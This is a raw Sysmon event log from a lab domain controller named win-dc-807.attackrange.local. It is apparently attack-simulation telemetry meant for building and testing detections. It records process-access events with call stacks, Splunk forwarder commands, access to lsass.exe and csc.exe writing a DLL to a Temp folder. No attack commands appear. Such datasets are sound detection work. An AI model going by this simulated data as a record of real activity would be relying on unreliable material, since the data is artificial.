15:53:05.412{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005905Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.412{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005904Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.412{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005903Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.412{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005902Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.412{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005901Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.412{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CE1-5FA1-3E01-000000008801}2736C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005900Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.412{D28789B6-7CE1-5FA1-3D01-000000008801}40764024C:\Windows\system32\cmd.exe{D28789B6-7CE1-5FA1-3E01-000000008801}2736C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005899Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.418{D28789B6-7CE1-5FA1-3E01-000000008801}2736C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{D28789B6-7CE1-5FA1-3D01-000000008801}4076C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000005898Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.412{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CE1-5FA1-3D01-000000008801}4076C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005897Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.412{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005896Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.412{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005895Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.412{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005894Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.412{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005893Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.412{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005892Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.412{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005891Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.412{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005890Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.412{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005889Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.412{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005888Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.412{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7CE1-5FA1-3D01-000000008801}4076C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005887Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.412{D28789B6-7CDE-5FA1-2301-000000008801}35642604C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{D28789B6-7CE1-5FA1-3D01-000000008801}4076C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18319|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005886Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.413{D28789B6-7CE1-5FA1-3D01-000000008801}4076C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CDE-5FA1-2301-000000008801}3564C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000005885Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.381{D28789B6-7CE1-5FA1-3A01-000000008801}38964020C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005884Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.334{D28789B6-7C62-5FA1-0B00-000000008801}8684840C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005883Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.334{D28789B6-7C62-5FA1-0B00-000000008801}8684840C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005882Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.334{D28789B6-7C62-5FA1-0B00-000000008801}8684840C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005881Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:53:05.318{D28789B6-7CE1-5FA1-3B01-000000008801}4052C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\ywwvlqhv.dll2020-11-03 15:53:05.209 10341000x80000000000000005880Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.318{D28789B6-7CE0-5FA1-3001-000000008801}47404528C:\Windows\system32\conhost.exe{D28789B6-7CE1-5FA1-3C01-000000008801}3628C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005879Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.318{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005878Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 